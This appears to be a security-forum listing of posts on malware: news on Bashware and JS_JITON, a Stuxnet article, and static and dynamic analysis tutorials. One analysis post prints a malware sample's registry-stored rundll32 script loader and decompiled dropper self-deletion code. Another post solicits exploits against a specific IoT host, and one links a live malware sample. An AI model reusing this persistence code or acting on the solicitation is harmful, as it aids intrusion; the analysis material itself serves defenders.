  13. 'Bashware' is a clever new type of malware that major antivirus programs can't detect. Microsoft surprised the technology world last year when it announced that users will be able to run native Linux applications in Windows 10 without virtualization. While this feature is meant to help developers, researchers believe it could be abused by attackers to hide malware from security products. Researchers from security firm Check Point Software Technologies developed a technique that uses Bash, the Linux command-line interface—or shell—that's now available in Windows, to make known malware undetectable. They named the result Bashware. The Windows 10 feature, called the Windows Subsystem for Linux (WSL), tricks Linux applications into believing they're communicating with the Linux kernel—the core part of the operating system that includes hardware drivers and essential services. In reality, those applications communicate with the WSL, which translates their system calls into equivalents for the Windows kernel. WSL was first announced in March 2016 and was added as a beta feature in the Windows 10 Anniversary Update, which was released in August 2016. Microsoft announced that it will become a fully supported feature in the upcoming Fall Creators Update. "WSL seems to be well designed. What allows Bashware to operate the way it does is the lack of awareness by various security vendors" WSL makes it easier for developers who need to write and test code both in Windows and Linux to do so without the overhead of a virtual machine. Many developers, whether they prefer Windows as their primary desktop OS or just need it for Visual Studio and other development tools, also like the simplicity of the Linux command line utilities for interacting with different programming language interpreters and component repositories. As it stands now, WSL is not turned on by default and users need to enable "development mode" on their systems in order to use it. However, Check Point claims that its Bashware attack automates the steps needed to silently enable WSL, download the Ubuntu-based userspace environment that comes with it, and then run malware inside. Linux programs executed through WSL will appear in Windows as "pico processes," a new type of process that is structurally different than those spawned by regular Windows applications. During their tests, the Check Point researchers found no security products that monitor pico processes, even though Microsoft provides a special application programming interface called the Pico API that can be used to do this. This apparent lack of interest by security vendors towards WSL might be the result of a widespread belief that users need to enable the feature manually and most of them won't do it because they don't have a need for it. However, according to Bashware's creators, "it's a little-known fact" that entering the developer mode can be achieved by modifying a few registry keys and this can be done silently in the background by an attacker who has the right privileges. A system reboot is indeed required under normal circumstances to enable WSL, but attackers could simply wait for victims to turn off their computers or could trigger a critical error to force a reboot, the Check Point researchers told me in an email. There might also be a way to load the WSL drivers manually without restarting the computer, but this method is still being investigated, they said. "We see it as both vital and urgent for security vendors to support this new technology in order to prevent threats such as the ones demonstrated by Bashware" What's interesting about Bashware is that attackers don't have to write malware programs for Linux in order to run them through WSL on Windows. Thanks to a program called Wine, they can use the technique to directly hide known Windows malware. In some ways, Wine is the equivalent of WSL on Linux, as it allows Linux users to run Windows programs on their systems without virtualization. The Bashware attack installs Wine inside the downloaded Ubuntu userspace environment and then launches Windows malware through it. Thanks to WSL, those malicious programs will be spawned back into Windows as pico processes, hiding them from security software. Check Point's Gal Elbaz and Dvir Atias are not the first security researchers to warn that attackers could abuse WSL to run malware. Reputed Windows internals expert Alex Ionescu called attention to the same risks in 2016 in talks at Black Hat USA and Microsoft's BlueHat conference. Ionescu, who is the vice president of endpoint detection and response strategy at security firm CrowdStrike, maintains a GitHub repository with his research on WSL. To some extent Bashware builds on Ionescu's prior findings, but the technique is adapted to the current state of WSL. It shows that one year later many security vendors are still not prepared to deal with this new technology. The good news is that in order to use Bashware, attackers need to already have administrator privileges on their victims' computers. This means they need to first compromise those systems using more traditional methods: phishing emails with malicious attachments, documents rigged with exploits for unpatched vulnerabilities, social engineering tricks, stolen administrative credentials and so on. Gaining admin rights on Windows computers is not necessarily a hard thing to do, and attackers do it all the time. However, these extra steps give security products a chance to detect and break attack chains before Bashware can be used to hide malicious payloads. The Check Point researchers declined to name the security products whose detection mechanisms they managed to bypass, noting that their goal is for this research to serve as a wakeup call for the entire security industry. WSL is not a common attack vector and if attackers were to use it as a source of attacks, they would first need to download malware onto the targeted computer, said Adam Bromwich, senior vice president of security technology and response at Symantec. "Based on this WSL architecture, Symantec's scanners, machine learning and protection technologies are designed to scan and detect malware created using WSL." Kaspersky Lab told me in an email it plans to modify its antivirus software to detect this type of malware in the future. Currently, all of the company's products can detect malware downloaders and other Windows-based parts of such attacks, Kaspersky Lab said. Antivirus firm Bitdefender did not immediately respond to a request for comment. We will update this post if we hear back. Update: This post has been updated with comment from Kaspersky, and has been updated to include more context about previous research in this area. Via vice.com
  14. Hey Crackers!!! I discovered an IoT based device on 84.241.* which I think it's some kind of smart camera, If you have any malware or exploit to attack corresponding host please don't hesitate to share with me. If there's a better discovery technique please let me know. Share your experience of the same IoT based platforms. Your LOVE H3$!z
  15. Acest challenge contine malware real. Rulati doar in masini virtuale(virtualbox, vmware, etc) izolate, fara access la retea. p.s. Programele de tip sandbox nu prezinta siguranta - testat Download: h t t p : / / g e . t t / 7 T V l L m i 2 Parola: dezarhivez un malware Challenge realizat in colaborare cu @Gecko Au rezolvat challenge-ul: @sclipici
  16. Salut, Vand coduri de activare pentru 2 dintre cele mai cunoscute produse de securitate, suita: mobile protection + antivirus pc 10$ paypal sau doar antivirus 5$. Cine este interesat ma poate contacta prin pm.
  17. OPERATIUNEA OLYMPIC GAMES Programatorii de la Agenția Națională de Securitate și armata israeliană au creat o serie de virusi pentru a ataca computerele care controlează centrul de îmbogățire nucleară a Iranului la Natanz. Atacurile au fost repetate in mai mulți ani, și de fiecare dată programele au fost imbunatatite , pentru a le face dificil de detectat. Una dintre variante a scăpat din Natanz și a devenit publica. Un articol din New York Times aparut in iunie 2012 a prezentat in detaliu actiunile de atac cibernetic 2006 – odata cu reinceperea programului de imbogatire a uraniului in uzina de la Natanz, US incepe planificarea unor actiuni de atac cibernetic 2007 – se realizeaza in laboratoare o replica a instalatiilor iraniene si incepe colaborarea cu Israelul pentru dezvoltarea unui virus 2008 – in uzina incep sa se defecteze centrifugele , simuland defectiuni aleatoare pentrua a deruta specialistii iranieni 2009 – noua administratie Obama preia de la G. Bush programul si decide sa il continue. Obama il revizuieste si cere informari periodice a evolutiei planului de atac. 2010 – primavara – US impreuna cu unitatea israeliana 8200 ataca cibernetic cu o varianta noua de virus o zona de 1000 centrifuge folosite la imbogatirea uraniului 2010 – vara – virusul creat apare pe Internet replicandu-se masiv. In cateva saptamani apar in presa informatii despre virus care este denumit Suxtnet . Obama decide continuarea atacului si in final circa 1000 centrifuge eprezentand 20% din total – sunt scoase din uz 2010-2011 – US estimeaza ca programul iranian a fost intarziat cu circa un an si jumatate 2011-2012 USA si Israelul, continuand atacurile, cauta noi tinte pentru a incetini programul nuclear iranian. Specialistii in securitate cibernetica au gasit alte malware-ului care au fost legate de Stuxnet : Flame,Duqu, Gauss, MiniFlame. Stuxnet este singurul care face de fapt daune fizice. Controlează transmisia în interiorul instalației de îmbogățire nucleară de la Natanz, aruncand în aer centrifugele. Toți ceilalți virusi sunt ca sprijin de malware: ei adună aduna informații, care pot fi apoi folosite pentru a lansa apoi noi atacuri, cum ar fi cu Stuxnet. Operatiunea Nitro Zeus În primii ani ai administrației Obama, Statele Unite au dezvoltat un plan elaborat pentru un atac cibernetic asupra Iranului, în cazul în care efortul diplomatic de a limita programul său nuclear nu ar fi reușit și s- ar fi ajuns la un conflict militar. Planul, cu numele de cod Nitro Zeus, a fost conceput pentru a dezactiva apărare aeriană, sistemele de comunicații și părți esențiale ale sistemului energetic din Iran și a fost amânat, cel puțin pentru viitorul apropiat, după acordul nuclear incheiat între Iran și șase alte națiuni. Practic prin acest atac, infrastructura Iranului ar fi fost scoasa din functiune. Nitro Zeus a făcut parte dintr-un efort de a asigura președintelui Obama alternative, la un război pe scară largă. Planificarea pentru Nitro Zeus a implicat mii de specialisti in programare si informatii, inclusiv plasarea implanturilor electronice în rețele de calculatoare iraniene pentru a „pregăti câmpul de luptă”, în limbajul Pentagonului. Aceasta operatiune avea ca scop si impiedicarea Israelului de a bombarda instalatiile iraniene si declansarea unui conflict regional. In timp ce Pentagonul facea aceste pregătiri, agențiile de informații americane au dezvoltat un cyberplan separat, mult mai concentrat pentru a dezactiva site-ul de îmbogățire nucleară Fordo, construit adânc în interiorul unui munte lângă orașul Qum. Atacul ar fi fost o operațiune sub acoperire, pe care președintele o poate autoriza chiar și în absența unui conflict direct. Fordo a fost mult timp considerat una dintre cele mai dificile ținte din Iran, îngropat prea adânc chiar pentru cele mai puternice arme anti buncar din arsenalul american. In conformitate cu termenii acordului nuclear cu Iranul, două treimi din centrifugele din interiorul Fordo au fost eliminate în ultimele luni, împreună cu toate materialele nucleare. In facilitate este interzisa orice lucrare legata de domeniul nuclear și este convertita la alte utilizări, cel puțin pentru următorii 15 ani. Dezvoltarea celor două programe secrete sugerează modul în care administrația Obama a fost preocupata de faptul că negocierile cu Iranul ar putea eșua. În acest fel, războiul cibernetic a devenit un element standard al arsenalului pentru ceea ce se numesc acum conflictele „hibrid”. Existența Nitro Zeus a fost dezvaluita in mod spectaculos si inedit prin documentarul „Zero Days”, prezentat pentru prima dată in februarie 2016 la Festivalul de Film de la Berlin. Regizat de Alex Gibney, care este cunoscut pentru alte documentare, inclusiv premiat cu Oscar „Taxi on the Dark Side” cu privire la utilizarea torturii de către anchetatorii americani, și „We steal secrets: WikiLeaks story”. Este considerat cel mai bun documentarist in prezent. „Zero days” descrie conflictul între Iran și Occident, atacul cibernetic privind uzina de îmbogățire a uraniului de la Natanz si dezbaterile din interiorul Pentagonului asupra faptului dacă Statele Unite au o doctrină viabilă pentru utilizarea unei noi forme de armament ale căror efecte finale sunt doar vag înțelese. Dl. Gibney și echipa lui de investigație, condusă de Javier Botero, au intervievat foști si actuali participanți în programul Iran, care au dezvăluit detalii cu privire la efortul de a insera in rețelele de calculatoare ale Iranului „implanturi”, care ar putea fi folosite pentru a monitoriza activitățile țării și, dacă este comandat de dl Obama, să atace infrastructura. (În conformitate cu normele prevăzute în directivele prezidențiale, unele făcute publice în urmă cu trei ani de Edward J. Snowden, doar președintele poate autoriza un atac cibernetic ofensiv, la fel ca și utilizarea armelor nucleare.) Sunt multi critici care comenteaza despre modul cum astfel de subiecte „delicate” au ajuns publice. In mod cert SUA si-a aratat o parte din capabilitatile sale in razboiul cibernetic. E posibil ca aceste capabilitati de distrugere a infrastructurii sa fi fost folosite in negocierile de succes cu Iranul ? Nu cred ca putem evalua, eventual putem ghici. Cert este ca asistam la o evolutie asemanatoare inceputurilor folosirii armamentului nuclear ca arma de intimidare si dominatie. Poate in acest nou domeniu militar sa avem si noi un cuvant de spus !! Sursa: http://www.rumaniamilitary.ro/razboiul-cibernetic-contra-iranului Zero days online: topdocumentaryfilms . com/zero-days/
  18. Security researchers from Trend micro recently discovered a new JavaScript-based malware that infects your mobile devices and also attacks your home router by altering its DNS (Domain Name System) settings. This new threat was named as JS_JITON and was first noticed in end of December 2015, continuing to infect devices up until this day, hitting its peak in February 2016, with over 1,500 infections per day. Researchers say that the malware spreads it’s infection chain in a very simple way. Attackers place their code in some websites and wait for users to visit The malware’s infection chain is simple. According to Trend Micro researchers, attackers place malicious code on compromised websites and wait for users to visit these pages using mobile devices. Once this happens, the malware is downloaded to the user’s mobile device and executes, trying to connect to the local home network’s router IP using a series of admin and passwords combos hardcoded in the JS_JITON malware source code. The malware has over 1,400 credentials are included, and once the malware authenticates on the device, it will change the router’s DNS settings. Very little is known about what the intentions of this malware are, but taking into account that at one point it also included malicious code that executed from desktop computers, Trend Micro researchers believe this is a “work in progress,” with its creators still exploring their attack’s capabilities. The belief was made strong by the fact that attackers regularly update JS_JITON’s source code, changing small details here and there, fine tuning their attacks. Additionally, at one point, the JS_JITON source code also included a keylogging component. According to researchers JS_JITON could attack D-Link and TP-Link routers, but it also included a special exploit to take advantage of CVE-2014-2321, an older vulnerability in ZTE modems. Malwares like this could be a serious threat if not killed in the initial stage. Source
  19. Windows Malware Analysis Essentials Master the fundamentals of malware analysis for the Windows platform and enhance your anti-malware skill set Author: Victor Marak Read: https://www.scribd.com/doc/283049338/Windows-Malware-Analysis-Essentials Download: https://www.sendspace.com/file/rbwzjv
  20. ome non typical malware which doesn't have any attention from "security experts" and other internet clowns. Maybe because of this it is not well detected on VT. The key features of it, making it non typical: 1) This malware lives in registry value. 2) Non typical dropper self-deletion method, nothing zero day though. 3) Malware startup location protection in a backdoor Sirefef way. 4) It downloads, installs and uses Windows KB968930 (MS PowerShell). More details below 1) This malware stored under key HKCU\Software\Microsoft\Windows\CurrentVersion\Run and it autostart location is invisible to regedit, why explained in part 3. That's what really here. "Unnamed" value is a forged registry value that holds command to execute malware script stored in "Default" value. Exactly this value makes regedit crazy. Autostart malware script below. rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>") It purpose - read, encode and execute script stored in the "Default" value. The decoded malware now set as process environment variable named "a" and contains additional code to execute stored again as script code, lets call it ScriptA. It is named ScriptA.txt in attached archive. Decoded script attached as ScriptB.txt. As you can see they multiple times use base64 encoding for layered payload. Inside ScriptB you can find another base64 encoded which is attached as PayloadA.txt. This is base64 encoded dll which is actual malware designed to be running inside zombified copy of dllhost.exe (this malware aware about WOW64 and will select appropriate version of this executable - Wow64DisableWow64FsRedirection %windir%\syswow64\dllhost.exe or %windir%\system32\dllhost.exe). Final payload dll (attached as payload.dll) packed with MPRESS v2.19. Unpacking MPRESS is similar to manual unpack of UPX. This dll is simple and is capable of downloading and executing arbitrary files on infected machine (WinExec). Also because it is used in startup process this dll is also responsible for zombifying dllhost.exe process and self-injection through NtQueueApcThread. 2) It uses NTFS ADS for dropper self-deletion and more trivial MoveFileEx with MOVEFILE_DELAY_UNTIL_REBOOT if first method failed. After self-deletion malware persist on infected computer only in the zombified processes VA and in the registry. First dropper attaches itself as stream to dropper. e.g. C:\malware.exe -> C:\malware.exe:0 where 0 is a NTFS data stream copy of malware.exe. Next it spawns process from ADS and calls DeleteFile. Yeah I too can F5 in HexRays. signed int __stdcall sub_401696(LPCSTR lpExistingFileName) { char *NewFileName; struct _STARTUPINFOA StartupInfo; struct _PROCESS_INFORMATION ProcessInformation; snprintf(&NewFileName, 0xFFFu, "%s:0", lpExistingFileName); if ( CopyFileA(lpExistingFileName, &NewFileName, 0) ) { StartupInfo.cb = 68; memset(&StartupInfo.lpReserved, 0, 0x40u); if ( CreateProcessA(&NewFileName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation) ) { CloseHandle(ProcessInformation.hThread); CloseHandle(ProcessInformation.hProcess); return 1; } DeleteFileA(&NewFileName); } else { if ( MoveFileExA(&NewFileName, 0, MOVEFILE_DELAY_UNTIL_REBOOT) ) return 1; } return 0; } 3) Embedded nulls used for protecting startup key HKCU\Software\Microsoft\Windows\CurrentVersion\Run key from removal and for hiding actual run value (regedit cannot handle incorrect value name and cancels listing items). Malware payload dll inside dllhost zombie process additionally works as a watchdog and will recover malware startup registry values if they are removed. Detection and Removal instructions: This malware can be easily revealed because of invasive self-protection it uses. Autoruns and ProcessExplorer from sysinternals all you need to detect presense of this malware. Locate and terminate dllhost.exe running without parents (it is launched by powershell that after exists). regdelnull hkcu -s to remove forged Run subkey. Regedit - delete whole HKCU\Software\Microsoft\Windows\CurrentVersion\Run key. Sample courtesy of R136a1 https://twitter.com/MalwareChannel/status/454939686885412864 Also thanks to B-boy/StyLe/ who bring attention to this malware. Download pass: infected Source
  21. The Windows API for Hackers and Reverse Engineers The Windows API is one of the “must know” areas for most reverse engineers and exploit writers. It’s an area than the more I use the APIs the more that I find myself looking up speific APIs and wishing that I would have known what I know now about these sometimes vague and/or mysterious functions. Why should someone who’s in the INFOSEC community care about these APIs? Well to put it shortly, they can make your life considerably easier. If you do incident response, are just getting starting writing exploits, or anything related, then you’ve likely seen these APIs mentioned before. They’re a crucial part of everything from shellcode design to malware analysis. One of the most common places you’ll run into these APIs is in malware analysis. The Windows APIs are crucial to nearly every piece of software that runs on Windows. Without these APIs malware authors would be left writing a considerable amount more code, which few malware authors want to do. Knowing that these are going to be the malware’s link to Windows itself, just examining the APIs can give you great clues about what the malware is trying to do. (Note: malware authors could statically compile their code, which would not need to import the APIs, this is not common and would leave the malware sample significantly larger) There are endless tools which will show you which APIs are being imported. Some of the most common tools are OllyDbg, Immunity Debugger, IDA Pro, MASTIFF, and countless other tools and scripts. Let’s take a look at a malware sample’s imports. kernel32.dll DeleteCriticalSection 0x4090dc kernel32.dll LeaveCriticalSection 0x4090e0 kernel32.dll EnterCriticalSection 0x4090e4 kernel32.dll VirtualFree 0x4090e8 kernel32.dll LocalFree 0x4090ec kernel32.dll GetCurrentThreadId 0x4090f0 kernel32.dll GetStartupInfoA 0x4090f4 kernel32.dll GetCommandLineA 0x4090f8 kernel32.dll FreeLibrary 0x4090fc kernel32.dll ExitProcess 0x409100 kernel32.dll WriteFile 0x409104 kernel32.dll UnhandledExceptionFilter 0x409108 kernel32.dll RtlUnwind 0x40910c kernel32.dll RaiseException 0x409110 kernel32.dll GetStdHandle 0x409114 user32.dll GetKeyboardType 0x40911c user32.dll MessageBoxA 0x409120 advapi32.dll RegQueryValueExA 0x409128 advapi32.dll RegOpenKeyExA 0x40912c advapi32.dll RegCloseKey 0x409130 kernel32.dll TlsSetValue 0x409138 kernel32.dll TlsGetValue 0x40913c kernel32.dll TlsFree 0x409140 kernel32.dll TlsAlloc 0x409144 kernel32.dll LocalFree 0x409148 kernel32.dll LocalAlloc 0x40914c wsock32.dll closesocket 0x409154 wsock32.dll WSACleanup 0x409158 wsock32.dll recv 0x40915c wsock32.dll send 0x409160 wsock32.dll connect 0x409164 wsock32.dll htons 0x409168 wsock32.dll socket 0x40916c wsock32.dll WSAStartup 0x409170 wsock32.dll gethostbyname 0x409174 advapi32.dll RegSetValueExA 0x40917c advapi32.dll RegCreateKeyA 0x409180 advapi32.dll RegCloseKey 0x409184 advapi32.dll AdjustTokenPrivileges 0x409188 advapi32.dll LookupPrivilegeValueA 0x40918c advapi32.dll OpenProcessToken 0x409190 user32.dll GetForegroundWindow 0x409198 user32.dll wvsprintfA 0x40919c kernel32.dll CloseHandle 0x4091a4 kernel32.dll RtlMoveMemory 0x4091a8 kernel32.dll RtlZeroMemory 0x4091ac kernel32.dll WriteProcessMemory 0x4091b0 kernel32.dll ReadProcessMemory 0x4091b4 kernel32.dll VirtualProtect 0x4091b8 kernel32.dll Sleep 0x4091bc kernel32.dll GetTickCount 0x4091c0 kernel32.dll MoveFileExA 0x4091c4 kernel32.dll ReadFile 0x4091c8 kernel32.dll WriteFile 0x4091cc kernel32.dll SetFilePointer 0x4091d0 kernel32.dll FindClose 0x4091d4 kernel32.dll FindFirstFileA 0x4091d8 kernel32.dll DeleteFileA 0x4091dc kernel32.dll CreateFileA 0x4091e0 kernel32.dll GetPrivateProfileIntA 0x4091e4 kernel32.dll GetPrivateProfileStringA 0x4091e8 kernel32.dll WritePrivateProfileStringA 0x4091ec kernel32.dll SetFileAttributesA 0x4091f0 kernel32.dll GetCurrentProcessId 0x4091f4 kernel32.dll GetCurrentProcess 0x4091f8 kernel32.dll Process32Next 0x4091fc kernel32.dll Process32First 0x409200 kernel32.dll Module32Next 0x409204 kernel32.dll Module32First 0x409208 kernel32.dll CreateToolhelp32Snapshot 0x40920c kernel32.dll WinExec 0x409210 kernel32.dll lstrcpyA 0x409214 kernel32.dll lstrcatA 0x409218 kernel32.dll lstrcmpiA 0x40921c kernel32.dll lstrcmpA 0x409220 kernel32.dll lstrlenA 0x409224 kernel32.dll lstrlenA 0x40922c kernel32.dll lstrcpyA 0x409230 kernel32.dll lstrcmpiA 0x409234 kernel32.dll lstrcmpA 0x409238 kernel32.dll lstrcatA 0x40923c kernel32.dll WriteProcessMemory 0x409240 kernel32.dll VirtualProtect 0x409244 kernel32.dll TerminateThread 0x409248 kernel32.dll TerminateProcess 0x40924c kernel32.dll Sleep 0x409250 kernel32.dll OpenProcess 0x409254 kernel32.dll GetWindowsDirectoryA 0x409258 kernel32.dll GetTickCount 0x40925c kernel32.dll GetSystemDirectoryA 0x409260 kernel32.dll GetModuleHandleA 0x409264 kernel32.dll GetCurrentProcessId 0x409268 kernel32.dll GetCurrentProcess 0x40926c kernel32.dll GetComputerNameA 0x409270 kernel32.dll ExitProcess 0x409274 kernel32.dll CreateThread 0x409278 user32.dll wvsprintfA 0x409280 user32.dll UnhookWindowsHookEx 0x409284 user32.dll SetWindowsHookExA 0x409288 user32.dll GetWindowThreadProcessId 0x40928c user32.dll GetWindowTextA 0x409290 user32.dll GetForegroundWindow 0x409294 user32.dll GetClassNameA 0x409298 user32.dll CallNextHookEx 0x40929c Looking over these imported API functions may at first seem useless to the untrained analyst. However, if you begin to dissect what some of the APIs can be used for you can begin to make assumptions about the function of this malware. For example GetTickCount is a very common API for detecting debuggers. AdjustTokenPrivileges and LookupPrivilegeValueA are both commonly used in accessing the Windows security tokens. RegSetValueExA, RegCreateKeyA, and RegCloseKey are used when accessing and altering a registry key. Taking just these APIs into consideration you could begin to make some interesting hypothesis about the capabilities of this specific sample. I’ve noticed that analysts who don’t totally understand these API function will typically ignore them. For that fact I’m creating a “cheat sheet” for the Windows API functions. The “pre-final” release is attached below. Please don’t forget that Microsoft did not build these APIs for malicious use and are very commonly used by Windows programmers (unless it’s an undocumented API). Thus analyzing just the imported APIs may not tell you if a sample is malicious or not (but is very useful if you already know a sample is malicious). Over the past month I’ve also been working on analyzing what is now over 5TB of malware to gather the most frequently used Windows APIs. This data will likely continue to process for close to another month. Once this is done I’ll work on completing this cheat sheet based on those findings and write another post about my discoveries. Keeping that in mind this list is not final and if you have any feedback, comments, questions, or recommendations please make them! In the course of developing the current list I used multiple resources, I’d just like to highlight a few. These are also great resources if you’re looking to learn more. Resources: Practical Malware Analysis – great book on reverse engineering malware MSDN – where to go if you’re curious about a specific Windows API Windows PE File Details – Great article that describes the fundamentals of the PE file and more details surrounding PE file imports Cheat Sheet Version .5 : Download Source : https://www.bnxnet.com/windows-api-for-hackers/
  22. Static Malware Analysis Starting here, I would like to share the results of my recent research into malware analysis. We will begin with some basics and proceed to advanced levels. In this first installment, we will discuss the techniques involved in static analysis of malware. I will also include some files for illustrative purposes in this document. Before we directly move onto the analysis part, let us set up context with some definitions. What is Malware? Malware is any software that does something that causes detriment to the user, computer, or network—such as viruses, trojan horses, worms, rootkits, scareware, and spyware. Malware Static Analysis Basic static analysis consists of examining the executable file without viewing the actual instructions. Basic static analysis can confirm whether a file is malicious, provide information about its functionality, and sometimes provide information that will allow you to produce simple network signatures. Basic static analysis is straightforward and can be quick, but it’s largely ineffective against sophisticated malware, and it can miss important behaviors. Enough with definitions — let’s get down to Malware Static Analysis Techniques. Malware Static Analysis Techniques Uploading the results to VirusTotal The very first technique in static analysis is to upload the suspicious executable to VirusTotal, which runs the executable against several AV solutions and gives the result. For example, the below file states that the detection ratio is 17 out of 57. Finding strings Searching through the strings can be a simple way to get hints about the functionality of a program. For example, if the program accesses a URL, then you will see the URL accessed stored as a string in the program. Microsoft has a utility called “Strings”. When Strings searches an executable for ASCII and Unicode strings, it ignores context and formatting, so that it can analyse any file type and detect strings across an entire file (though this also means that it may identify bytes of characters as strings when they are not). Strings searches for a three-letter or greater sequence of ASCII and Unicode characters, followed by a string termination character. Below are some examples of strings from which important information can be revealed. Using the Strings utility, files can be searched with following command at the cmd: Strings <filename> Example 1: Below is a string extraction of keywords from a malicious executable. As we can see, it gives us good information that functions like “FindNextFileA” and “FindFirstFileA”, which shows that this executable will search for a file, and then combining that with “CopyFileA” means that it will find a file and replace it with another file. Another important point to note that is about “Kerne132.dll”. This is a misleading text and should not be confused with “Kernel32.dll”. Example 2: Below is another extraction from a string utility. It shows us that usage of “CreateProcessA” will create a process. Commands like “Exec” and “sleep” are used to control a remote file. It can be a bot as well, and then an IP field, which can be the IP of a controlling server. Example 3: Below is another example of an extraction using Strings. Interesting fields are “InternetOpenURLA” which states that it will connect with some external server to download something, and then we have a http:// file also, which even clarifies the server address from which it will connect and download. How to check if a malware code is obfuscated or not? Often malware writers obfuscate their codes so that the files are hard to read. When a packed program runs, a wrapper program also runs around to unpack it. With static analysis, it is really hard to predict which files are packed unless it is clearly evident that they are. For example, tools like PEid sometimes are able to tell that the files are packed. In the below figure, it is clearly evident that files are packed with UPX. Files which are UPX packed can be unpacked by the following command: upx –o <newfilename> -d <packedfilename> PE file sections ETHICAL HACKING TRAINING – RESOURCES (INFOSEC) Information gathering from Portable Executable (PE) file format PE file format is used by Windows executables, DDLs etc. It contains the necessary information for Windows OS loader to run the code. While examining the PE files, we can analyse which functions have been imported, exported and what type of linking is there i.e. runtime, static or dynamic. PE file sections A PE file contains a header and some more important sections. Under these sections there is some useful information. Let’s understand these sections as well. .text: This contains the executable code. .rdata: This sections holds read only globally accessible data. [.data: Stores global data accessed through the program. .rsrc: This sections stores resources needed by the executable. Most often malware writers use dynamic linking in their code. For example, with the use of the tool Dependency Walker, we can see in the below screenshot that under WININET.dll are functions like “InternetOpenUrlA”, which states that this malware will make a connection with some external server. Note: Wininet.dll contains higher level networking functions that implement protocols such as FTP, HTTP and NTP. Under the header, there is a subsection named “IMAGE_FILE_HEADER”, which contains the timestamp field. This timestamp shows the compile time of the executable. This is very important information, since if the time is old, then there may a case that AV solutions might have a signature around it. However, this field is not reliable, since the compile can be changed easily by the malware writer. Suppose from static analysis, an analyst predicts that the executable will create a process and then suppose the following exec and sleep command is found, but there is no information found about the respective DLL, which has a function to connect with another server. In that case, the resource is hidden with the executable. Open the .rsrc section of PE file with a tool like Resource Hacker to gain more information regarding the malware. Below is the analysing of the above resource using PEview. As we have learnt with static analysis, there is very little information that can be gathered, but it is very useful too. In a coming article, I will bring in dynamic analysis though basic to the rescue. Source MALWARE ANALYSIS BASICS - PART 2 Dynamic Analysis Techniques As we have covered the malware analysis basics with static techniques here, this post is all about performing the basic analysis of malware using dynamic technique. As we have seen in the previous post, the ability to fully perform malware analysis is very much restricted using static techniques either due to obfuscation, packing, or the analyst having exhausted the available static analysis techniques. Precautions Before performing dynamic malware analysis, be sure to do it in a safe environment. Consider deploying a Windows virtual machine and using VMware for provisioning virtual machines. You should also take a snapshot of the virtual machine before executing the malicious binaries so that the safe state can be easily restored. Analyzing with Process Monitor Process Monitor is an advanced monitoring tool for Windows that provides a way to monitor certain registry, file system, network, process, and thread activities. Process Monitor monitors all system calls it can gather as soon as it is run. Since there are always huge number of calls being made in the Windows OS, it is sometimes impractical to discover important events. Process Monitor helps this issue with a filter tab through which we can filter by the type of calls. For example, see the screenshot below. It shows that I have applied a filter with operation of “WriteFile” and “RegSetValue”. These are usually the call made by a malicious executable to write the file onto the disk and to make registry changes. After applying the filter, we get a list of following events in Process Monitor. The most important are the top two entries which shows the execution of file and creation of registry entry with a new entry named “Video Driver.” Other entries can be ignored as it is usual for pseudorandom numbers to be generated. On clicking the first entry, we can even see that what action that call has made. As is clear from the screenshot below, a total 7168 bytes have been written to the file system by this binary. Analyzing with Process Explorer Process Explorer is a tool used for performing dynamic analysis and can give you a great insight onto the processes currently running onto the system. Below is an example of the process being created after running a binary. Clicking on process can help you reveal whether the process has created any mutant or not. Also it can give you all the information about the DLLs being used by the function. Below, the screenshot shows that the process uses ws2_32.dll, which means that a network connection will be made by this process. Double clicking a particular process will yield more information about the process. Some of the important attributes are: Verify Option. There is a verify option in every process to check whether that binary is signed by the MS or not. Below, the screenshot depicts that this binary is not signed by the MS. Threads will showcase the number of threads associated with this process. Strings tab can help in determining whether there is any process replacement occur or not. If two strings are drastically different then the process replacement might have occur. Below, the screenshot shows that strings in the executable both on disk and in memory. Using INetSim INetSim is a free Linux based suite for simulating common Internet services. It is sometimes difficult to analyze a malware without letting it complete execute the code and that can involve contacting the outer world for services over http, https, FTP etc. INetSIM does exactly this by emulating services like Http, Https, FTP and allows analyst to analyze the behaviour of malware. Since this is Linux based, the best way to use this is to install it on a Linux machine and keep it in the same network as that of windows testing machine. INetSIM can serve any type of request that the malware might request for. For example, suppose a malware requests for an image from the for tis code to execute. INetSIM can fulfil the request of the malware though the image will not be what malware will be looking for but it will keep the malware to keep executing the code. INetSIM can also log all the request from the client regardless of the port. This can be used to record all the data sent from malware. In the next series, we will move to advanced techniques of malware analysis using both static and dynamic analysis. Source
  23. Hey you can crash any version of skype: read here Hope you guys like it Ya i am not distributing malware trust me
  24. Nektra SpyStudio is an all-in-one tool for cyber security analysts, DevOps, QA engineers, and developers. This multi-tool is useful for application virtualization, troubleshooting Windows applications, application performance monitoring, malware analysis, and as a process monitor complement. Get it now Read more at Nothing found for - | SharewareOnSale
×
×
  • Create New...